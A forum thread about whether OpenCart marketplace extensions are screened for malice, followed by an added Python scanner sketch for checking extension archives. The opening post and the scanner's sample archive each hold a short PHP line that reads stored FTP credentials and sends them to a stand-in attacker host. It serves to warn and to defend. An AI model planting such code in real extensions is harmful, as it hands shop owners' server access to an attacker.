Post by Tomit » Wed Dec 28, 2016 12:19 am

I was just wondering, do the modules get screened before they are added to the marketplace?

I think there should be a permission system within opencart, to which the modules need to ask permission to access certain configuration data.

What would stop anyone with bad intent from getting your server data?
All they need to do is upload a free module that looks awesome and add an ocmod file with something like this:

$u = $this->config->get('config_ftp_username');
$p = $this->config->get('config_ftp_password');
$updateFeed = file_get_contents("http://mymalicouswebsiteurll/i_got_your_ftp_credentials.php?username=$u&password=$p");
And they have full FTP access to your account.

Not many people will really check the files they are installing, and your server could get compromised without you knowing anything is wrong.


Post by IP_CAM » Wed Dec 28, 2016 1:31 am

Nope, they are not; everybody is free to offer Mods and Themes. In addition, uncounted websites exist, offering their own additions, so it would be impossible to keep control. It's therefore the sole responsibility of OC users to make sure to run a secure shop, and if one acquires extensions, partly even from unknown sources, it cannot be the problem of OC.

This, especially under the aspect that sites exist offering paid OC extensions for free, for whatever reason. And some of them possibly add their own STUFF to some extensions, in order to possibly still participate some day, by gaining access, and so be able to steal other paid extensions, programs, and/or data from such servers.

Just accept it as it is. And make sure to keep your shop site clean. That's all you can do about it. Good Luck! ;)
Ernie

My Github OC Site: https://github.com/IP-CAM
5'200 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.



Post by thekrotek » Wed Dec 28, 2016 4:29 am

I feel your pain, bro. But don't get too pesky about it, since most developers (and I mean 99.99999999999999% of them) are the good guys. If a single schmuck ever injects something in his code, he'll get reported and banned instantly.

If you're worried about security, you can add a simple script to your site and run it after every extension installation/setup. There are tons of scripts that check for basic exploits like base64_encode stuff or any kind of file requests. If you're a good programmer, you can even write your own. They're all based on the same logic anyway.

Professional OpenCart extensions, support and custom work.
Contact me via email or Skype by support@thekrotek.com
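
A sketch of the kind of pre-install check suggested in the reply above, added here as an example; it is not code from any poster or from OpenCart. The rule names, regexes, scanned suffixes and the sample archive are assumptions constructed for illustration, and the heuristics will miss obfuscated or indirect calls.

```python
import io
import re
import zipfile

# Heuristic rules (assumptions for this example, not an official OpenCart list).
RULES = {
    "reads-credential": re.compile(
        r"config->get\(\s*['\"]config_\w*(?:password|username)['\"]"),
    "outbound-request": re.compile(
        r"\b(?:curl_init|fsockopen)\s*\(|\b(?:file_get_contents|fopen)\s*\(\s*['\"]https?://"),
    "obfuscation": re.compile(r"\b(?:eval|base64_decode|gzinflate|str_rot13)\s*\("),
}
SCANNED_SUFFIXES = (".php", ".xml", ".tpl", ".twig")

def scan_text(name, text):
    """Return (file, line_no, rule) for every rule hit in one file's text."""
    return [(name, n, rule)
            for n, line in enumerate(text.splitlines(), start=1)
            for rule, pattern in RULES.items() if pattern.search(line)]

def scan_archive(zip_bytes):
    """Scan an extension zip; return (hits, files that read credentials AND call out)."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as archive:
        for member in archive.namelist():
            if member.lower().endswith(SCANNED_SUFFIXES):
                text = archive.read(member).decode("utf-8", errors="replace")
                hits.extend(scan_text(member, text))
    by_file = {}
    for name, _, rule in hits:
        by_file.setdefault(name, set()).add(rule)
    exfil = sorted(f for f, rules in by_file.items()
                   if {"reads-credential", "outbound-request"} <= rules)
    return hits, exfil

def build_sample_archive():
    """Constructed sample zip: an OCMOD file with the pattern from the first post."""
    ocmod = (
        "<modification><file path=\"catalog/controller/common/home.php\">\n"
        "<operation><add><![CDATA[\n"
        "$p = $this->config->get('config_ftp_password');\n"
        "$f = file_get_contents(\"http://collector.example/x.php?password=$p\");\n"
        "]]></add></operation></file></modification>\n")
    clean = "<?php\nclass ControllerExtensionModuleDemo extends Controller {}\n"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("install.xml", ocmod)
        archive.writestr("upload/catalog/controller/extension/module/demo.php", clean)
    return buf.getvalue()
```

A file that appears in the second return value both reads a stored credential and contacts a remote host, which is the combination worth reviewing by hand before the extension is installed.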

